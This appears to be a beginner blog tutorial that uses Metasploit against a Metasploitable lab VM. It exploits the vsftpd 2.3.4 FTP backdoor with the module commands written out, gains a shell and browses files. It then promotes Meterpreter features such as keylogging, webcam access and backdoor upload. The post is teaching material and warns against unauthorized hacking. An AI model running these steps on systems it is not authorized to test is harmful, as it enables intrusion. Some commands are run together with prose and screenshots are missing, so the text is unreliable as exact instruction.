Vulnerability - It is a weakness of a particular application that we can take an advantage of. It is the one that we usually looking for in our information gathering.
Exploits - It is a piece of code that can take advantage of the vulnerability found in a particular application.
Payload - It is a piece of code sent along with the exploit to be executed in the victims machines.
Now that we have a brief understanding of Vulnerability, Exploits and Payloads, we shall dive to demonstrate an attack to the vulnerability we found in our information gathering lately which is in port 21/tcp which is a ftp service (File Transfer Protocol)
The tool that we will gonna use is Metasploit.
In our attacking machine (Kali Linux). Open a terminal and issue the following command:
service postgresql start && service metasploit start && msfconsole
Now we will search if there is an exploit available in metasploit for this. Type in the command
Then you will see something like this
As you notice, there is available exploit for the version of ftp running on victims machine (metasploitable)
Then we issued a command
use exploit/unix/ftp/vsftpd_234_backdoorlets take a look regarding an information about this exploit, type in
info
Just scroll down to see its description
Now that we had our exploit, let take a look for available payload for this exploit. Type in:
show payloads
Then you will see something like this
Notice the compatible payload available, then we will use this payload as well as we typed
set payload cmd/unix/interact
Now that we have our exploit and payload, let us first see all available required options to fill up
Type in:
show options
Notice that the exploit module options needs a RHOST to be filled up. This is where we will input the ipaddress of the victims machine (metasploitable). see the information gathering where the ipaddress of victims machine (metasploitable) is 192.168.153.130
Type in:
set RHOST 192.168.153.130Also notice that the payload options doesn't require any input.
NOTE: Many of the payloads available in metasploit requires options to be filled up. You will encounter this as you practice your skills.
Now that we are all set, it's time to get wet and get our shell. Type in
exploit
As you can see, we type in
ifconfigAnd notice that our ipaddress is the address of the victims machine (metasploitable).
Let us explore the directories of the compromised machine. Just follow the commands.
We use
dirTo show the directories, and
cdTo change directories
Notice at the end of command we typed in
nano hackthisBecause, here we are going to edit the file hackthis.
+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
More about Exploitation.
In our demonstration which is maybe not quite interesting, you may say "is that all?", well I say, "NO!". It is only to give you an understanding of exploitation, how to exploit and how to use metasploit framework as a tools of choice. There is a lot you need to know about this coolest hacking/penetration testing tool if I may say. Imagine the following:
What if you can download a file from a compromised machine?
What if you can upload a virus/backdoor to that machine?
What if you can log all the keystrokes made in that machine?
What if you can view the screenshot of that machine?
Can i turn the webcam on? wow!
Can I reboot it? hehe!
All of those "what if" and "can I" can be done. yeah! that's right if I'm not mistaken Hehe! Remember about payload, the command that will be executed? there is a cutting edge payload available in metasploit framework that can make your wishes come true called the Meterpreter.
WHAT NOW?
Practice your newly acquired knowledge in exploitation. Remember in our information gathering, we discovered many open ports. TRY THEM ALL! and try to set your payload to meterpreter as possible as you can so the you can experience its power. Check out Offensive-Security's Metasploit-unleashed for more resource of how to use metasploit framework.
AGAIN! AGAIN! AGAIN! Let me remind you that DO NOT EVER TRY TO HACK INTO COMPUTER/MACHINE THAT YOU ARE NOT AUTHORIZED or YOU DO NOT OWN.
That is why Metasploitable was born.
Tools you can use for exploitation, NOTE: Some are commercial.
1. Canvas
2. Core Impact
3. w3af
4. BeEF
5. Social Engineer Toolkit (SET)
Please post your comment so that I could improve my site.
Thanks
Code_in_the_Shell
No comments:
Post a Comment